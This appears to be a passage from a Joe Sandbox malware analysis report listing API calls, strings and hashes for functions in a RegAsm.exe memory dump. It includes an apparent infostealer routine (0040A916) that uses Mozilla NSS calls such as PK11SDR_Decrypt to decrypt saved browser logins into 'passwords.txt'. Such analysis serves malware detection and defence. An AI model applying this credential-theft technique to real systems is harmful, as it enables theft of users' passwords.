Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58

Function 004014A2 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950

Function 0040DCA0 Relevance: 90.4, APIs: 60, Instructions: 399memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,750A5460,?,00000000), ref: 0040DBBB
Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBCD

GetProcessHeap.KERNEL32(00000008,?,750A5460,?,00000000), ref: 0040DD04
HeapAlloc.KERNEL32(00000000), ref: 0040DD0B
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD20
HeapFree.KERNEL32(00000000), ref: 0040DD27
strcpy_s.MSVCRT ref: 0040DD43
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD55
HeapFree.KERNEL32(00000000), ref: 0040DD62
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DD93
HeapFree.KERNEL32(00000000), ref: 0040DD9A
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DDA1
HeapAlloc.KERNEL32(00000000), ref: 0040DDA8
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDBD
HeapFree.KERNEL32(00000000), ref: 0040DDC4
strcpy_s.MSVCRT ref: 0040DDDA
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDEC
HeapFree.KERNEL32(00000000), ref: 0040DDF3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE11
HeapFree.KERNEL32(00000000), ref: 0040DE18
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DE1F
HeapAlloc.KERNEL32(00000000), ref: 0040DE26
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE3B
HeapFree.KERNEL32(00000000), ref: 0040DE42
strcpy_s.MSVCRT ref: 0040DE52
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE64
HeapFree.KERNEL32(00000000), ref: 0040DE6B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE93
HeapFree.KERNEL32(00000000), ref: 0040DE9A
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DEA1
HeapAlloc.KERNEL32(00000000), ref: 0040DEA8
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEC3
HeapFree.KERNEL32(00000000), ref: 0040DECA
strcpy_s.MSVCRT ref: 0040DEDD
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEEF
HeapFree.KERNEL32(00000000), ref: 0040DEF6
lstrlenA.KERNEL32(00000000), ref: 0040DEFF
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040DF15
HeapAlloc.KERNEL32(00000000), ref: 0040DF1C
lstrlenA.KERNEL32(00000000), ref: 0040DF34

Part of subcall function 0040F128: std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

strcpy_s.MSVCRT ref: 0040DF75
GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0040DF9B
HeapFree.KERNEL32(00000000), ref: 0040DFA8
lstrlenA.KERNEL32(?), ref: 0040DFAD
GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040DFBC
HeapAlloc.KERNEL32(00000000), ref: 0040DFC3
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFD7
HeapFree.KERNEL32(00000000), ref: 0040DFDE
strcpy_s.MSVCRT ref: 0040DFEC
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFF9
HeapFree.KERNEL32(00000000), ref: 0040E000
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E035
HeapFree.KERNEL32(00000000), ref: 0040E03C
GetProcessHeap.KERNEL32(00000008,?), ref: 0040E043
HeapAlloc.KERNEL32(00000000), ref: 0040E04A
strcpy_s.MSVCRT ref: 0040E065
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E077
HeapFree.KERNEL32(00000000), ref: 0040E07E
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E122
HeapFree.KERNEL32(00000000), ref: 0040E129
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E173
HeapFree.KERNEL32(00000000), ref: 0040E17A

Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBF2
Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
Part of subcall function 0040DB7F: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
Part of subcall function 0040DB7F: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
Part of subcall function 0040DB7F: strcpy_s.MSVCRT ref: 0040DC6F

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
String ID:
API String ID: 838878465-0
Opcode ID: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
Instruction ID: 0a8d11442738e0aebf2a58bd4f58ea1ebce0464b8d6fd0751a66cb0fe0de1c79
Opcode Fuzzy Hash: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
Instruction Fuzzy Hash: F0E14C72C00219ABEF249FF1DC48ADEBF79BF08305F1454AAF115B3152EA3A59849F54

Function 6C0E55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C0BE1A5), ref: 6C0E5606
LoadLibraryW.KERNEL32(gdi32,?,6C0BE1A5), ref: 6C0E560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C0E5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C0E563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C0E566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C0E567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C0E5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C0E56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C0E56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C0E56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C0E56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C0E5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C0E572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C0E5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C0E5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C0E577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C0E5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C0E57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C0E57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C0E57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C0E57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C0E57FF

Strings

GetWindowDC, xrefs: 6C0E5710
GetMonitorInfoW, xrefs: 6C0E57A2
StretchDIBits, xrefs: 6C0E57CC
GetDpiForWindow, xrefs: 6C0E5690
gdi32, xrefs: 6C0E560A
CreateWindowExW, xrefs: 6C0E56C5
ShowWindow, xrefs: 6C0E56DE
GetThreadDpiAwarenessContext, xrefs: 6C0E562D
ReleaseDC, xrefs: 6C0E5742
EnableNonClientDpiScaling, xrefs: 6C0E5666
LoadIconW, xrefs: 6C0E575B
SetWindowLongPtrW, xrefs: 6C0E57B7
LoadCursorW, xrefs: 6C0E5774
DeleteObject, xrefs: 6C0E57F9
FillRect, xrefs: 6C0E5729
user32, xrefs: 6C0E5601
MonitorFromWindow, xrefs: 6C0E578D
CreateSolidBrush, xrefs: 6C0E57E4
RegisterClassW, xrefs: 6C0E56AC
AreDpiAwarenessContextsEqual, xrefs: 6C0E5637
GetSystemMetricsForDpi, xrefs: 6C0E5677
SetWindowPos, xrefs: 6C0E56F7

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 6f0f88e3cc0305f6e8dcb9d896f830e2a4208ab98f1da4883143ffafebb9ef16
Instruction ID: 25a19895ee50df92e9bd8583a44d437a52ad33b56b552decd682d75628c94366
Opcode Fuzzy Hash: 6f0f88e3cc0305f6e8dcb9d896f830e2a4208ab98f1da4883143ffafebb9ef16
Instruction Fuzzy Hash: 6B512474752706AFDB019F358E49A263BFCAB0E389710482DA965F2A51EF74C801DF64

Function 6C0CCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C09582D), ref: 6C0CCC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C09582D), ref: 6C0CCC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C0FFE98,?,?,?,?,?,6C09582D), ref: 6C0CCC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C09582D), ref: 6C0CCC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C09582D), ref: 6C0CCC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C09582D), ref: 6C0CCC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C09582D), ref: 6C0CCCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C0CCCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C0CCCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C0CCCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C0CCCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C0CCD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C0CCD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C0CCD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C0CCDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C0CCDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C0CCDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C0CCDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C0CCE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C0CCE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C0CCE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C0CCE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C0CCE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C0CCE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C0CCE8A

Strings

nativeallocations, xrefs: 6C0CCDA8
fileioall, xrefs: 6C0CCCA8
mainthreadio, xrefs: 6C0CCC7C
fileio, xrefs: 6C0CCC92
noiostacks, xrefs: 6C0CCCBE
notimerresolutionchange, xrefs: 6C0CCE00
Unrecognized feature "%s"., xrefs: 6C0CCEA0
markersallthreads, xrefs: 6C0CCE42
power, xrefs: 6C0CCE84
preferencereads, xrefs: 6C0CCD92
seqstyle, xrefs: 6C0CCCE6
jsallocations, xrefs: 6C0CCD0E
audiocallbacktracing, xrefs: 6C0CCDD4
unregisteredthreads, xrefs: 6C0CCE58
nostacksampling, xrefs: 6C0CCD7C
ipcmessages, xrefs: 6C0CCDBE
stackwalk, xrefs: 6C0CCCF8
java, xrefs: 6C0CCC37
samplingallthreads, xrefs: 6C0CCE2C
cpuallthreads, xrefs: 6C0CCE16
processcpu, xrefs: 6C0CCE6E
leaf, xrefs: 6C0CCC66
default, xrefs: 6C0CCC21
screenshots, xrefs: 6C0CCCD4

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 7e8674e67077f2b816ca276d5f8520c145c1551a56530dc457336e24fbad36b3
Instruction ID: 1470f3d8a27b4c54ed93f9ac1d25d05889d815357e83bf3f1f9ade7d496a32f4
Opcode Fuzzy Hash: 7e8674e67077f2b816ca276d5f8520c145c1551a56530dc457336e24fbad36b3
Instruction Fuzzy Hash: FF51CAD1B0926512FE103115DD11BAE14C8EF5338AF54403AED29A2E80FF65BACF86B7

Function 0040A916 Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 211stringmemoryfileCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A922

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004373A4,0043680F), ref: 0040A9C1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9D9
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9E1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9ED
??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9F7
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA09
GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA15
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA1C
StrStrA.SHLWAPI(0040B824,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA2D
StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA47
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA5A
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA64
lstrcatA.KERNEL32(00000000,004373A8,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA70
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA7A
lstrcatA.KERNEL32(00000000,004373AC,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA86
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA93
lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA9B
lstrcatA.KERNEL32(00000000,004373B0,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAA7
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAB7
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAC7
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AADA

Part of subcall function 0040A7D8: _memset.LIBCMT ref: 0040A815
Part of subcall function 0040A7D8: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A830
Part of subcall function 0040A7D8: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040A838
Part of subcall function 0040A7D8: PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A846
Part of subcall function 0040A7D8: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A85A
Part of subcall function 0040A7D8: PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A89A
Part of subcall function 0040A7D8: _memmove.LIBCMT ref: 0040A8BB
Part of subcall function 0040A7D8: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A8EC

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAE9
lstrcatA.KERNEL32(00000000,004373B4,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAF5
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB05
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB15
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB28

Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,00436807,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8E5
Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,0043680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8FB

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB37
lstrcatA.KERNEL32(00000000,004373B8,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB43
lstrcatA.KERNEL32(00000000,004373BC,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB4F
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB5F
lstrlenA.KERNEL32(00000000), ref: 0040AB7D
CloseHandle.KERNEL32(?), ref: 0040ABAC
NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040ABB2

Strings

pe, xrefs: 0040A931
passwords.txt, xrefs: 0040AB89

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$lstrcpy$K11_lstrlen$HeapPointerSlot$AllocAuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeString_memmove_memset
String ID: passwords.txt$pe
API String ID: 2725232238-1761351166
Opcode ID: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
Instruction ID: 1a907496ddc9cbec6b75df531e31c39fb9952b717cdae40389231e62c8e49acd
Opcode Fuzzy Hash: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
Instruction Fuzzy Hash: DF71A331500215ABCF15EFA1DD4DD9E3BBAEF4830AF101015F901A31A1EB7A5A55CBA6

Function 6C0947C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C094801
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C094817
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C09482D
__Init_thread_footer.LIBCMT ref: 6C09484A

Part of subcall function 6C0BAB3F: EnterCriticalSection.KERNEL32(6C10E370,?,?,6C083527,6C10F6CC,?,?,?,?,?,?,?,?,6C083284), ref: 6C0BAB49
Part of subcall function 6C0BAB3F: LeaveCriticalSection.KERNEL32(6C10E370,?,6C083527,6C10F6CC,?,?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C0BAB7C

GetCurrentThreadId.KERNEL32 ref: 6C09485F
GetCurrentThreadId.KERNEL32 ref: 6C09487E
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C09488B
free.MOZGLUE(?), ref: 6C09493A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C094956
free.MOZGLUE(00000000), ref: 6C094960
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C09499A

Part of subcall function 6C0BAB89: EnterCriticalSection.KERNEL32(6C10E370,?,?,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284), ref: 6C0BAB94
Part of subcall function 6C0BAB89: LeaveCriticalSection.KERNEL32(6C10E370,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C0BABD1

free.MOZGLUE(?), ref: 6C0949C6
free.MOZGLUE(?), ref: 6C0949E9

Part of subcall function 6C0A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0A5EDB
Part of subcall function 6C0A5E90: memset.VCRUNTIME140(6C0E7765,000000E5,55CCCCCC), ref: 6C0A5F27
Part of subcall function 6C0A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0A5FB2

Strings

MOZ_PROFILER_SHUTDOWN, xrefs: 6C094A42
[I %d/%d] profiler_shutdown, xrefs: 6C094A06
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C0947FC
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C094828
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C094812

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
